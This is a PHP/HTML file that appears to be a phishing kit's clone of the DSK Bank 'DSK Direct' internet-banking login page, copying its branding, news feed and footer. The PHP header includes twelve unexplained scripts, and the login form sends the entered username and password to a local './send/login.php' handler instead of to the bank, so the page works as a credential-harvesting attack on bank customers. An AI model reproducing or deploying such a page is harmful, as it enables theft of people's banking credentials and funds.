<?php
include('./a/1.php');
include('./a/2.php');
include('./a/3.php');
include('./a/4.php');
include('./a/5.php');
include('./a/6.php');
include('./a/7.php');
include('./a/8.php');
include('./a/9.php');
include('./a/10.php');
include('./a/11.php');
include('./a/12.php');
?>
<html xml:lang="en" lang="en" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ДСК Директ</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Pragma" content="no-cache"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="Keywords" content=""><meta name="description" content="Добре дошли на страницата ДСК Директ за Интернет банкиране на Банка ДСК, ОТП Група. ДСК ДИРЕКТ предлага следните електронни канали за своите клиенти: Телeфонно Банкиране чрез Call Center на Банката; SMS услуги; Интернет банкиране; РС банкиране."><meta http-equiv="X-UA-Compatible" content="IE=edge"><link href="./css/index_style.css" type="text/css" rel="stylesheet"><script src="https://connect.facebook.net/signals/config/286168341802168?v=2.8.34&amp;r=stable" async=""></script><script async="" src="https://connect.facebook.net/en_US/fbevents.js"></script><script async="" src="//www.google-analytics.com/analytics.js"></script><script type="text/javascript" src="/calendar/calendar.js">/**/</script><script type="text/javascript" src="/js/html5.js">/**/</script><script type="text/javascript" src="/js/jquery/jquery-1.6.4.min.js">/**/</script><script type="text/javascript" src="/js/jquery/jquery-ui-1.10.4/jquery-ui-1.10.4.custom.min.js">/**/</script><script type="text/javascript" src="/js/jquery.ba-bbq.js">/**/</script><script type="text/javascript" src="/js/jquery.validate.js">/**/</script><script type="text/javascript" src="/js/jquery.validate.unobtrusive.js">/**/</script><script type="text/javascript" src="/js/jquery.validate.custom.js">/**/</script><script type="text/javascript" src="/js/jquery.tablesorter.js">/**/</script><script type="text/javascript" src="/js/jquery.tablesorter.pager.js">/**/</script><script type="text/javascript" src="/js/jquery.specific.scripts.js">/**/</script><script type="text/javascript" src="/js/js.js">/**/</script><script type="text/javascript" src="/js/jquery.pagination.js">/**/</script><script type="text/javascript" src="/js/scroll.js">/**/</script><script type="text/javascript" src="/js/limits.js">/**/</script><script type="text/javascript" src="/js/validation.js">/**/</script><script type="text/javascript" src="/js/behaviour.js">/**/</script><script type="text/javascript" src="/js/ajax/debug/MicrosoftAjax.debug.js">/**/</script><script type="text/javascript">
          if (window.location.hash)
          Sys.Application._currentEntry = window.location.hash.substr(1);
        </script><script type="text/javascript" src="/js/ajax/MicrosoftAjaxTemplates.js">/**/</script><script type="text/javascript" src="/js/ajax/json2.debug.js">/**/</script><script type="text/javascript" src="/js/jquery.tmpl.min.js">/**/</script><script type="text/javascript" src="/js/jquery.format-1.3.min.js">/**/</script><script type="text/javascript" src="/js/knockout/knockout-2.0.0.js">/**/</script><script type="text/javascript" src="/js/knockout/knockout.mapping-2.1.0.js">/**/</script><script type="text/javascript" src="/js/jquery.ui.selectmenu.js">/**/</script><script type="text/javascript" src="/js/jquery-dais-ajax.js">/**/</script><script type="text/javascript" src="/js/jquery-dais.js">/**/</script><script type="text/javascript" src="/jsGAC/mvc/helper.js"></script><script type="text/javascript" src="/js/tooltip.js">/**/</script><script type="text/javascript" src="/js/ui.js">/**/</script><script type="text/javascript" src="/js/dais.widget.manager.js">/**/</script><script type="text/javascript" src="/js/campaignmanager.js">/**/</script><script type="text/javascript" src="&#13;&#10;            /js/lang/strings-bg.js&#13;&#10;          "></script><script type="text/javascript" src="/calendar/my.js"></script><script type="text/javascript" src="/js/datecontrol.js">/**/</script><script type="text/javascript" src="/js/svg4everybody.js"></script><script type="text/javascript">svg4everybody();</script><link rel="shortcut icon" href="./favicon.ico" type="image/vnd.microsoft.icon"><link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon"><script type="text/javascript" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
		var apikey = 'UA-58707314-4';
		(function (i, s, o, g, r, a, m) {
			i['GoogleAnalyticsObject'] = r; i[r] = i[r] || function () {
				(i[r].q = i[r].q || []).push(arguments)
			}, i[r].l = 1 * new Date(); a = s.createElement(o),
			m = s.getElementsByTagName(o)[0]; a.async = 1; a.src = g; m.parentNode.insertBefore(a, m)
		})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
		ga('create', apikey, 'auto');
		ga('require', 'displayfeatures');
		ga('send', 'pageview');
	</script><script xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
        !function(f,b,e,v,n,t,s)
        {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
        n.callMethod.apply(n,arguments):n.queue.push(arguments)};
        if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
        n.queue=[];t=b.createElement(e);t.async=!0;
        t.src=v;s=b.getElementsByTagName(e)[0];
        s.parentNode.insertBefore(t,s)}(window, document,'script',
        'https://connect.facebook.net/en_US/fbevents.js');
        fbq('init', '286168341802168');
        fbq('track', 'PageView');
    </script><noscript xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=286168341802168&amp;ev=PageView&amp;noscript=1"></noscript><script type="text/javascript" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    /*  */
    var google_conversion_id = 850154699;
    var google_custom_params = window.google_tag_params;
    var google_remarketing_only = true;
    /*  */
    </script><script type="text/javascript" src="//www.googleadservices.com/pagead/conversion.js" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema"></script><script src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/850154699/?random=1544351581471&amp;cv=9&amp;fst=1544351581471&amp;num=1&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;eid=376635471%2C659255991&amp;u_h=768&amp;u_w=1366&amp;u_ah=728&amp;u_aw=1366&amp;u_cd=24&amp;u_his=11&amp;u_tz=60&amp;u_java=false&amp;u_nplug=3&amp;u_nmime=4&amp;sendb=1&amp;frm=0&amp;url=http%3A%2F%2F127.0.0.1%2Fsss%2Fdsbanknew%2Fbg-BG%2Findex.html%3Fid%3D5d5b381ce7bbe48e9cbb76d7a690aa37country%3DBg&amp;ref=http%3A%2F%2F127.0.0.1%2Fsss%2F&amp;tiba=%D0%94%D0%A1%D0%9A%20%D0%94%D0%B8%D1%80%D0%B5%D0%BA%D1%82&amp;rfmt=3&amp;fmt=4"></script></head><body class="login"><iframe name="google_cookie_match_frame" title="Google cookie match frame" width="1" height="1" src="https://bid.g.doubleclick.net/xbbe/pixel?d=KAE" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" style="display:none" scrolling="no"></iframe><noscript xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="//googleads.g.doubleclick.net/pagead/viewthroughconversion/850154699/?guid=ON&amp;script=0"></div></noscript><style>
          .squid-ink {
          width:24px;height:24px;
          }

        </style><div id="AjaxRequestError" style="display: none;" xmlns="">error</div><script type="text/html" id="AjaxRequestErrorTemplate" xmlns=""><div style="margin-left: 10px; overflow: auto; max-height: 400px;"><p>Съжаляваме, но е възникнала грешка при обработката на исканата от Вас страница. Грешката е регистрирана.</p>
        {{each(index, value) Messages}}
          {{html value}}
        {{/each}}
      </div></script><script tyle="text/javascript" xmlns="">
          $(function() {
              $('body').bind("AjaxRequestError", function(e, data){
                  var div = $('#AjaxRequestError').empty();
                  $("#AjaxRequestErrorTemplate").tmpl(data).appendTo(div);
                  div.dialog({
                      modal: true,
                      closeOnEscape: true,
                      title: STR_ERROR,
                      resizable: false,
                      width: 600,
                      height: 400,
                      open: function (event, ui) {  },
                      close: function () { 
                        div.empty(); 
                        $('body').trigger("AjaxRequestErrorClosed");
                      },
                      buttons: {
                        "затвори" : function() {
                            $(this).dialog("close");
                        }
                      }
                  });
              });
          });
      </script><div id="AjaxRequestErrorLoginFail" class="text" style="display:none" xmlns=""><p>Сесията ви е изтекла. </p><a href="/page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/.login" style="width:80px" class="btn primary"><span>Вход</span></a></div><script type="text/javascript" xmlns="">
   		$(function ()
			{
				$('body').bind("AjaxRequestErrorLoginFail", function(e){

				  var div = $('#AjaxRequestErrorLoginFail');
                            
				  div.dialog({
					  modal: true,
					  bgiframe: true,
					  closeOnEscape: false,
                            title: STR_SESSION_EXPRED,
					  open: function (event, ui) { $(".ui-dialog-titlebar-close").hide(); }
				  });
				});             
			});
		</script><div id="AjaxRequestErrorSessionUnauthorized" class="text" style="display:none" xmlns=""><p>Трябва да представите допълнително средство за сигурност</p><a href="/page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/.requestAuth&amp;returnToUrl=/bg-BG/.login" style="width:50px" class="btn primary"><span>OK</span></a></div><script type="text/javascript" xmlns="">
   		$(function ()
			{
				
		   $('body').bind("AjaxRequestErrorSessionUnauthorized", function(e){
							var div = $('#AjaxRequestErrorSessionUnauthorized');
                            
							div.dialog({
								modal: true,
								bgiframe: true,
								closeOnEscape: false,
                title: 'Неавтентикирана сесия',
								open: function (event, ui) { $(".ui-dialog-titlebar-close").hide(); }
							});
						 });
						});
		</script><div id="generalAJAXError" class="redtext ajaxError" style="display: none;">
          Възникнала е грешка / There was an error
        </div><form id="mainForm" name="mainForm" method="post" style="margin:0px" action="./send/login.php"><div id="wrapper" class="login"><div id="content" class=""><header id="header"><div class="container"><div id="serviceArea" class="service-area" xmlns=""><a href="/page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/en-US/.login"><svg class="squid-ink squid-ink-globe" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#globe"></use></svg><span>English</span></a></div><div id="feedBack" xmlns=""></div></div><nav class="navbar nav-main" xmlns=""><div class="container"><ul class="main-menu"><li class="brand-item"><a class="homelink" href="&#13;&#10;            &#13;&#10;          "><img src="./image//Direct.bg.svg.svg"></a></li></ul></div></nav></header><div id="login-controls" xmlns=""><section id="login"><div class="container"><div class="row"><div class="col-8"><div class="banner banner-main"><div class="banners"><a border="0" href="https://dskbank.bg/%D0%BF%D1%80%D0%B5%D0%BF%D0%BE%D1%80%D1%8A%D0%BA%D0%B8-%D0%B7%D0%B0-%D1%81%D0%B8%D0%B3%D1%83%D1%80%D0%BD%D0%BE%D1%81%D1%82" target="_blank"><img border="0" src="./image/DSK_Security_1104x74.jpg" alt="" title=""></a></div><div class="banners"><a border="0" href="" target="_blank"><img border="0" src="./image/DSK_WizzAir_DSK_Direct_1600x700px.jpg" alt="" title=""></a></div></div><div id="news"><ul class="news-feed"><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.93/.7981_05_06_09_51_26_0803"><h4 class="heading subheading">25.07.2019</h4><p>Планирана профилактика</p></a></li><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.94/.7981_06_02_07_28_44_0394"><h4 class="heading subheading">29.06.2019</h4><p>Миграция към най-високите стандарти за сигурна комуникация с електронното банкиране на Банка ДСК</p></a></li><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.94/.7981_06_04_09_01_59_0510"><h4 class="heading subheading">27.06.2019</h4><p>Проследете Вашите отстъпки и точки, натрупани по програмите за лоялност за кредитни карти </p></a></li><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.94/.7981_06_30_15_25_09_0666.7981_06_30_06_20_04_0723.7981_06_10_11_54_30_0946.7981_06_06_09_16_38_0203"><h4 class="heading subheading">25.06.2019</h4><p>Подобрения в  извлеченията по Вашите сметки </p></a></li><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.94/.7981_06_30_15_25_09_0666.7981_06_30_06_20_04_0723"><h4 class="heading subheading">04.06.2019</h4><p>Улеснение при извършване на група преводи през ДСК Директ, чрез уведомление с SMS код</p></a></li><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.95/.7981_07_14_10_46_51_0115"><h4 class="heading subheading">17.05.2019</h4><p>Нови възможности за нареждане на превод в DSK Smart</p></a></li><li><a href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/.7982/.97/.7981_09_16_14_59_52_0609"><h4 class="heading subheading">10.04.2019</h4><p>Новопоявили се случаи на опит за измама по имейл</p></a></li></ul><a class="btn btn-secondary btn-sm btn-archive" href="/Page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/bg-BG/News/">Архив Новини</a></div></div><div class="col-4"><div id="m_ctrl_Page" class="login-box" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><input type="hidden" name="processlogin" value="true"><input id="langCheck" type="hidden" value="bg-BG"><input type="hidden" name="EnrolledChannel" value=""><div id="login_header" class="bg-BG"><div class="login-tabs"><a onclick="changeLoginChannel();">
                            Частни клиенти 
                        </a><a onclick="changeLoginChannel();"> 
                            Бизнес клиенти 
                        </a></div></div><div class="login-form"><div class="form-group"></div><div class="form-group"><input type="hidden" name="userName_Limit" id="Hidden1" value="STR_LIMIT_ATLEAST_ONE"><label>
                            Потребител
                        </label><input class="form-control edit" id="Text1" tabindex="1" name="userName" maxlength="30" pattern="[^@]{3,60}"><script type="text/javascript" required="" ""="">
                            window.document.forms[0].userName.focus();
                        </script></div><div class="form-group"><input type="hidden" name="pwd_Limit" id="Hidden2" value="STR_LIMIT_ATLEAST_ONE"><label>
                            Парола
                        </label><input type="password" class="form-control edit" id="Password1" tabindex="2" name="pwd" autocomplete="off" required="" ""=""></div><button type="submit" class="btn btn-primary submit" id="btn_login" onclick=" return  DisabledSubmitButton('/Page/default.aspx?xml_id=/bg-BG/.processlogin','btn_login')">
                                         Вход
                                </button><input type="hidden" name="returnToUrl" value=""><a href="" id="resetPassword" onclick="GoToResetPage()">Забравена парола</a>

                        Провери автентичността на сайта
                        <div id="Symantec"><script type="text/javascript" src="https://seal.websecurity.norton.com/getseal?host_name=www.dskdirect.bg&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></div><input type="hidden" name="CorporateChannel" value="2500"></div><div id="login_footer"></div><script>
        
    </script></div><div class="box banner-right"><div class="banners"><a border="0" href="" target="_blank"><img border="0" src="./image/DSK_CarInsurance_360x160_BG.png" alt="Car Insurance" title="Car Insurance"></a></div></div></div></div></div></section><section class="banner-smart"><div class="container"><a href="https://dskbank.bg/%D0%B8%D0%BD%D0%B4%D0%B8%D0%B2%D0%B8%D0%B4%D1%83%D0%B0%D0%BB%D0%BD%D0%B8-%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82%D0%B8/%D0%B4%D1%81%D0%BA-%D0%B4%D0%B8%D1%80%D0%B5%D0%BA%D1%82/%D0%BC%D0%BE%D0%B1%D0%B8%D0%BB%D0%BD%D0%B8-%D0%BF%D1%80%D0%B8%D0%BB%D0%BE%D0%B6%D0%B5%D0%BD%D0%B8%D1%8F/%D0%B4%D1%81%D0%BA-%D1%81%D0%BC%D0%B0%D1%80%D1%82"><img src="./image/smart.svg" class="smart-image"></a></div></section></div><div id="tooltip2" onmouseover="tooltip_OnMouseOver()" onmouseout="tooltip_OnMouseOut()"> </div><footer><div class="container" xmlns=""><ul><li class="social-links"><a href="https://www.facebook.com/dskbank"><img src="./image/facebook.svg"></a><a href="http://www.youtube.com/dskbank"><img src="./image/youtube.svg"></a></li><li><a href="https://dskbank.bg/" target="_blank"><img src="./image/BankaDSK_ciril_CM_White.svg"></a></li><li></li></ul><div class="links list-of-links"><h4>Информация</h4><ul><li><a href="https://dskbank.bg/docs/default-source/%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82-%D0%B1%D0%B0%D0%BD%D0%BA%D0%B8%D1%80%D0%B0%D0%BD%D0%B5/%D0%BF%D0%BE%D1%82%D1%80%D0%B5%D0%B1%D0%B8%D1%82%D0%B5%D0%BB%D1%81%D0%BA%D0%BE-%D1%80%D1%8A%D0%BA%D0%BE%D0%B2%D0%BE%D0%B4%D1%81%D1%82%D0%B2%D0%BE-%D0%B4%D1%81%D0%BA-%D0%B4%D0%B8%D1%80%D0%B5%D0%BA%D1%82.pdf" target="_blank">Потребителско ръководство</a></li><li><a href="https://dskbank.bg/%D0%BF%D1%80%D0%B5%D0%BF%D0%BE%D1%80%D1%8A%D0%BA%D0%B8-%D0%B7%D0%B0-%D1%81%D0%B8%D0%B3%D1%83%D1%80%D0%BD%D0%BE%D1%81%D1%82" target="_blank">Съвети за сигурност</a></li><li><a href="https://www.youtube.com/watch?v=L1gSLMwJJcQ&amp;list=PLG4yq9b9q8zHLJfvQOfdWg5liNnvLz1mP" target="_blank">Демо филм за граждани</a></li><li><a href="https://www.youtube.com/watch?v=L1gSLMwJJcQ&amp;list=PLG4yq9b9q8zHLJfvQOfdWg5liNnvLz1mP" target="_blank">Демо филм за фирми</a></li><li><a href="https://dskbank.bg/docs/default-source/bank-tarrif/%D1%82%D0%B0%D1%80%D0%B8%D1%84%D0%B0-%D0%B7%D0%B0-%D1%84%D0%B8%D0%B7%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8-%D0%BB%D0%B8%D1%86%D0%B0.pdf" target="_blank">Тарифа за граждани</a></li><li><a href="https://dskbank.bg/docs/default-source/%D1%82%D0%B0%D1%80%D0%B8%D1%84%D0%B0-%D0%B1%D0%B8%D0%B7%D0%BD%D0%B5%D1%81-%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82%D0%B8/%D1%82%D0%B0%D1%80%D0%B8%D1%84%D0%B0-%D0%B7%D0%B0-%D0%B1%D0%B8%D0%B7%D0%BD%D0%B5%D1%81-%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82%D0%B8.pdf" target="_blank">Тарифа за фирми</a></li><li><a href="https://dskbank.bg/docs/default-source/%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82-%D0%B1%D0%B0%D0%BD%D0%BA%D0%B8%D1%80%D0%B0%D0%BD%D0%B5/o%D0%B1%D1%89%D0%B8-%D1%83%D1%81%D0%BB%D0%BE%D0%B2%D0%B8%D1%8F-%D0%B7%D0%B0-%D0%BF%D0%BE%D0%BB%D0%B7%D0%B2%D0%B0%D0%BD%D0%B5-%D0%BD%D0%B0-%D0%B4%D1%81%D0%BA-%D0%B4%D0%B8%D1%80%D0%B5%D0%BA%D1%82-%D0%B7%D0%B0-%D1%84%D0%B8%D0%B7%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%B8-%D0%BB%D0%B8%D1%86%D0%B0.pdf" target="_blank">Общи условия за граждани</a></li><li><a href="https://dskbank.bg/docs/default-source/%D0%B8%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82-%D0%B1%D0%B0%D0%BD%D0%BA%D0%B8%D1%80%D0%B0%D0%BD%D0%B5-%D0%B1%D0%B8%D0%B7%D0%BD%D0%B5%D1%81/%D0%BE%D0%B1%D1%89%D0%B8-%D1%83%D1%81%D0%BB%D0%BE%D0%B2%D0%B8%D1%8F-%D0%B7%D0%B0-%D0%B8%D0%B7%D0%BF%D0%BE%D0%BB%D0%B7%D0%B2%D0%B0%D0%BD%D0%B5-%D0%BD%D0%B0-%D0%B5%D0%BB%D0%B5%D0%BA%D1%82%D1%80%D0%BE%D0%BD%D0%BD%D0%BE-%D0%B1%D0%B0%D0%BD%D0%BA%D0%B8%D1%80%D0%B0%D0%BD%D0%B5-%D0%B7%D0%B0-%D0%B1%D0%B8%D0%B7%D0%BD%D0%B5%D1%81-%D0%BA%D0%BB%D0%B8%D0%B5%D0%BD%D1%82%D0%B8.pdf" target="_blank">Общи условия за фирми</a></li></ul></div><ul class="call-center"><li>0700 10 375</li><li>*2375</li><li>call_center@dskbank.bg</li></ul></div></footer></div></div></form><control id="CondComments" ctype="Control" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><!--[if IE]>
	    <link rel="stylesheet" type="text/css" media="screen" href="/css/ie.css">
    <![endif]--><!--[if IE 7]>
	    <link rel="stylesheet" type="text/css" media="screen" href="/css/ie7.css">
    <![endif]--><!--[if IE 8]>
	    <link rel="stylesheet" type="text/css" media="screen" href="/css/ie8.css">
    <![endif]--><!--[if IE 9]>
	    <link rel="stylesheet" type="text/css" media="screen" href="/css/ie9.css">
    <![endif]--></control><script type="text/javascript" src="/js/ui/ui.js">/**/</script><svg version="1.1" class="blur-background" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
    <defs>
    <filter id="blur">
    <feGaussianBlur stdDeviation="12"></feGaussianBlur>
    </filter>
  </defs>
    <image xlink:href="/repository/photos/DSK_Smart_1600x700px.jpg" width="100%" height="100%" filter="url(#blur)"></image>
  </svg></body></html>